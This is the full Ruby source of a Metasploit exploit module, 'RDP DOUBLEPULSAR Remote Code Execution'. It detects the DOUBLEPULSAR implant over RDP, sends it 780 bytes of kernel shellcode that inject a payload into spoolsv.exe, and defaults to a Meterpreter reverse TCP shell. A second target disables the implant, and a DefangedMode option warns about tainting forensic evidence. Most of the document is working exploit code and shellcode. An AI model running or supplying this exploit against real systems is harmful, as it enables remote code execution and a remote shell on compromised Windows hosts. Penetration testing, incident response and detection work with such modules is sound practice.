Share
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Exploit::Remote  
  
Rank = GreatRanking  
  
include Msf::Exploit::Remote::RDP  
  
MAX_SHELLCODE_SIZE = 4096  
  
def initialize(info = {})  
super(update_info(info,  
'Name' => 'RDP DOUBLEPULSAR Remote Code Execution',  
'Description' => %q{  
This module executes a Metasploit payload against the Equation Group's  
DOUBLEPULSAR implant for RDP.  
  
While this module primarily performs code execution against the implant,  
the "Neutralize implant" target allows you to disable the implant.  
},  
'Author' => [  
'Equation Group', # DOUBLEPULSAR implant  
'Shadow Brokers', # Equation Group dump  
'Luke Jennings', # DOPU analysis and detection  
'wvu', # RDP DOPU analysis and module  
'Tom Sellers', # RDP DOPU analysis  
'Spencer McIntyre' # RDP DOPU analysis  
],  
'References' => [  
['URL', 'https://github.com/countercept/doublepulsar-detection-script']  
],  
'DisclosureDate' => '2017-04-14', # Shadow Brokers leak  
'License' => MSF_LICENSE,  
'Platform' => 'win',  
'Arch' => ARCH_X64,  
'Privileged' => true,  
'Payload' => {  
'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,  
'DisableNops' => true  
},  
'Targets' => [  
['Execute payload (x64)',  
'DefaultOptions' => {  
'EXITFUNC' => 'thread',  
'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'  
}  
],  
['Neutralize implant',  
'DefaultOptions' => {  
'PAYLOAD' => nil # XXX: "Unset" generic payload  
}  
]  
],  
'DefaultTarget' => 0,  
'Notes' => {  
'AKA' => ['DOUBLEPULSAR'],  
'RelatedModules' => ['exploit/windows/smb/smb_doublepulsar_rce'],  
'Stability' => [CRASH_OS_DOWN],  
'Reliability' => [REPEATABLE_SESSION]  
}  
))  
  
register_advanced_options([  
OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),  
OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])  
])  
end  
  
OPCODES = {  
exec: 0x01,  
ping: 0x02,  
burn: 0x03  
}.freeze  
  
DOUBLEPULSAR_MAGIC = 0x19283744  
  
# https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/ns-wdm-_osversioninfoexw  
def parse_doublepulsar_ping(res)  
return unless res && res.length == 288  
  
magic, _size, major, minor, build = res.unpack('V5')  
sp_major, _sp_minor, _suites, prod, arch = res[-8..-1].unpack('v3C2')  
  
return unless magic == DOUBLEPULSAR_MAGIC  
  
ver_str = "#{major}.#{minor}.#{build}"  
sp_str = "SP#{sp_major}"  
  
prod_str =  
case prod  
when 1  
'Workstation'  
when 2  
'Domain Controller'  
when 3  
'Server'  
end  
  
arch_str =  
case arch  
when 1  
'x86'  
when 2  
'x64'  
end  
  
"Windows #{prod_str} #{ver_str} #{sp_str} #{arch_str}"  
end  
  
def setup  
super  
  
rdp_connect  
is_rdp, server_selected_protocol = rdp_check_protocol  
  
fail_with(Failure::BadConfig, 'Target port is not RDP') unless is_rdp  
  
case server_selected_protocol  
when RDPConstants::PROTOCOL_HYBRID, RDPConstants::PROTOCOL_HYBRID_EX  
fail_with(Failure::BadConfig, 'DOUBLEPULSAR does not support NLA')  
when RDPConstants::PROTOCOL_SSL  
vprint_status('Swapping plain socket to SSL')  
swap_sock_plain_to_ssl  
end  
rescue Rex::ConnectionError, RdpCommunicationError => e  
fail_with(Failure::Disconnected, e.message)  
end  
  
def cleanup  
rdp_disconnect  
  
super  
end  
  
def check  
print_status('Sending ping to DOUBLEPULSAR')  
res = do_rdp_doublepulsar_pkt(OPCODES[:ping])  
  
unless (info = parse_doublepulsar_ping(res))  
print_error('DOUBLEPULSAR not detected or disabled')  
return CheckCode::Safe  
end  
  
print_warning('DOUBLEPULSAR RDP IMPLANT DETECTED!!!')  
print_good("Target is #{info}")  
CheckCode::Vulnerable  
end  
  
def exploit  
if datastore['DefangedMode']  
warning = <<~EOF  
  
  
Are you SURE you want to execute code against a nation-state implant?  
You MAY contaminate forensic evidence if there is an investigation.  
  
Disable the DefangedMode option if you have authorization to proceed.  
EOF  
  
fail_with(Failure::BadConfig, warning)  
end  
  
# No ForceExploit because check is accurate  
unless check == CheckCode::Vulnerable  
fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')  
end  
  
case target.name  
when 'Execute payload (x64)'  
print_status("Generating kernel shellcode with #{datastore['PAYLOAD']}")  
shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])  
shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)  
vprint_status("Total shellcode length: #{shellcode.length} bytes")  
  
print_status('Sending shellcode to DOUBLEPULSAR')  
res = do_rdp_doublepulsar_pkt(OPCODES[:exec], shellcode)  
when 'Neutralize implant'  
return neutralize_implant  
end  
  
if res  
fail_with(Failure::UnexpectedReply, 'Unexpected response from implant')  
end  
  
print_good('Payload execution successful')  
end  
  
def neutralize_implant  
print_status('Neutralizing DOUBLEPULSAR')  
res = do_rdp_doublepulsar_pkt(OPCODES[:burn])  
  
if res  
fail_with(Failure::UnexpectedReply, 'Unexpected response from implant')  
end  
  
print_good('Implant neutralization successful')  
end  
  
def do_rdp_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)  
rdp_send_recv(make_rdp_mcs_doublepulsar(opcode, body))  
rescue Errno::ECONNRESET, RdpCommunicationError  
nil  
end  
  
=begin  
MULTIPOINT-COMMUNICATION-SERVICE T.125  
DomainMCSPDU: channelJoinConfirm (15)  
channelJoinConfirm  
result: rt-domain-not-hierarchical (2)  
initiator: 14120  
requested: 6402  
=end  
def make_rdp_mcs_doublepulsar(opcode, body)  
data = "\x3c" # channelJoinConfirm  
data << [DOUBLEPULSAR_MAGIC].pack('V')  
data << [opcode].pack('v')  
  
if body  
data << [body.length, body.length, 0].pack('V*')  
data << body  
end  
  
build_data_tpdu(data)  
end  
  
# ring3 = user mode encoded payload  
# proc_name = process to inject APC into  
def make_kernel_user_payload(ring3, proc_name)  
sc = make_kernel_shellcode(proc_name)  
  
sc << [ring3.length].pack('S<')  
sc << ring3  
  
sc  
end  
  
def generate_process_hash(process)  
# x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm  
proc_hash = 0  
process << "\x00"  
  
process.each_byte do |c|  
proc_hash = ror(proc_hash, 13)  
proc_hash += c  
end  
  
[proc_hash].pack('l<')  
end  
  
def ror(dword, bits)  
(dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF  
end  
  
def make_kernel_shellcode(proc_name)  
# see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm  
# Length: 780 bytes  
"\x31\xc9\x41\xe2\x01\xc3\x56\x41\x57\x41\x56\x41\x55\x41\x54\x53" \  
"\x55\x48\x89\xe5\x66\x83\xe4\xf0\x48\x83\xec\x20\x4c\x8d\x35\xe3" \  
"\xff\xff\xff\x65\x4c\x8b\x3c\x25\x38\x00\x00\x00\x4d\x8b\x7f\x04" \  
"\x49\xc1\xef\x0c\x49\xc1\xe7\x0c\x49\x81\xef\x00\x10\x00\x00\x49" \  
"\x8b\x37\x66\x81\xfe\x4d\x5a\x75\xef\x41\xbb\x5c\x72\x11\x62\xe8" \  
"\x18\x02\x00\x00\x48\x89\xc6\x48\x81\xc6\x08\x03\x00\x00\x41\xbb" \  
"\x7a\xba\xa3\x30\xe8\x03\x02\x00\x00\x48\x89\xf1\x48\x39\xf0\x77" \  
"\x11\x48\x8d\x90\x00\x05\x00\x00\x48\x39\xf2\x72\x05\x48\x29\xc6" \  
"\xeb\x08\x48\x8b\x36\x48\x39\xce\x75\xe2\x49\x89\xf4\x31\xdb\x89" \  
"\xd9\x83\xc1\x04\x81\xf9\x00\x00\x01\x00\x0f\x8d\x66\x01\x00\x00" \  
"\x4c\x89\xf2\x89\xcb\x41\xbb\x66\x55\xa2\x4b\xe8\xbc\x01\x00\x00" \  
"\x85\xc0\x75\xdb\x49\x8b\x0e\x41\xbb\xa3\x6f\x72\x2d\xe8\xaa\x01" \  
"\x00\x00\x48\x89\xc6\xe8\x50\x01\x00\x00\x41\x81\xf9" +  
generate_process_hash(proc_name.upcase) +  
"\x75\xbc\x49\x8b\x1e\x4d\x8d\x6e\x10\x4c\x89\xea\x48\x89\xd9" \  
"\x41\xbb\xe5\x24\x11\xdc\xe8\x81\x01\x00\x00\x6a\x40\x68\x00\x10" \  
"\x00\x00\x4d\x8d\x4e\x08\x49\xc7\x01\x00\x10\x00\x00\x4d\x31\xc0" \  
"\x4c\x89\xf2\x31\xc9\x48\x89\x0a\x48\xf7\xd1\x41\xbb\x4b\xca\x0a" \  
"\xee\x48\x83\xec\x20\xe8\x52\x01\x00\x00\x85\xc0\x0f\x85\xc8\x00" \  
"\x00\x00\x49\x8b\x3e\x48\x8d\x35\xe9\x00\x00\x00\x31\xc9\x66\x03" \  
"\x0d\xd7\x01\x00\x00\x66\x81\xc1\xf9\x00\xf3\xa4\x48\x89\xde\x48" \  
"\x81\xc6\x08\x03\x00\x00\x48\x89\xf1\x48\x8b\x11\x4c\x29\xe2\x51" \  
"\x52\x48\x89\xd1\x48\x83\xec\x20\x41\xbb\x26\x40\x36\x9d\xe8\x09" \  
"\x01\x00\x00\x48\x83\xc4\x20\x5a\x59\x48\x85\xc0\x74\x18\x48\x8b" \  
"\x80\xc8\x02\x00\x00\x48\x85\xc0\x74\x0c\x48\x83\xc2\x4c\x8b\x02" \  
"\x0f\xba\xe0\x05\x72\x05\x48\x8b\x09\xeb\xbe\x48\x83\xea\x4c\x49" \  
"\x89\xd4\x31\xd2\x80\xc2\x90\x31\xc9\x41\xbb\x26\xac\x50\x91\xe8" \  
"\xc8\x00\x00\x00\x48\x89\xc1\x4c\x8d\x89\x80\x00\x00\x00\x41\xc6" \  
"\x01\xc3\x4c\x89\xe2\x49\x89\xc4\x4d\x31\xc0\x41\x50\x6a\x01\x49" \  
"\x8b\x06\x50\x41\x50\x48\x83\xec\x20\x41\xbb\xac\xce\x55\x4b\xe8" \  
"\x98\x00\x00\x00\x31\xd2\x52\x52\x41\x58\x41\x59\x4c\x89\xe1\x41" \  
"\xbb\x18\x38\x09\x9e\xe8\x82\x00\x00\x00\x4c\x89\xe9\x41\xbb\x22" \  
"\xb7\xb3\x7d\xe8\x74\x00\x00\x00\x48\x89\xd9\x41\xbb\x0d\xe2\x4d" \  
"\x85\xe8\x66\x00\x00\x00\x48\x89\xec\x5d\x5b\x41\x5c\x41\x5d\x41" \  
"\x5e\x41\x5f\x5e\xc3\xe9\xb5\x00\x00\x00\x4d\x31\xc9\x31\xc0\xac" \  
"\x41\xc1\xc9\x0d\x3c\x61\x7c\x02\x2c\x20\x41\x01\xc1\x38\xe0\x75" \  
"\xec\xc3\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" \  
"\x20\x48\x8b\x12\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x45\x31\xc9" \  
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1" \  
"\xe2\xee\x45\x39\xd9\x75\xda\x4c\x8b\x7a\x20\xc3\x4c\x89\xf8\x41" \  
"\x51\x41\x50\x52\x51\x56\x48\x89\xc2\x8b\x42\x3c\x48\x01\xd0\x8b" \  
"\x80\x88\x00\x00\x00\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20" \  
"\x49\x01\xd0\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\xe8\x78\xff" \  
"\xff\xff\x45\x39\xd9\x75\xec\x58\x44\x8b\x40\x24\x49\x01\xd0\x66" \  
"\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48" \  
"\x01\xd0\x5e\x59\x5a\x41\x58\x41\x59\x41\x5b\x41\x53\xff\xe0\x56" \  
"\x41\x57\x55\x48\x89\xe5\x48\x83\xec\x20\x41\xbb\xda\x16\xaf\x92" \  
"\xe8\x4d\xff\xff\xff\x31\xc9\x51\x51\x51\x51\x41\x59\x4c\x8d\x05" \  
"\x1a\x00\x00\x00\x5a\x48\x83\xec\x20\x41\xbb\x46\x45\x1b\x22\xe8" \  
"\x68\xff\xff\xff\x48\x89\xec\x5d\x41\x5f\x5e\xc3"  
end  
  
def kernel_shellcode_size  
make_kernel_shellcode('').length  
end  
  
end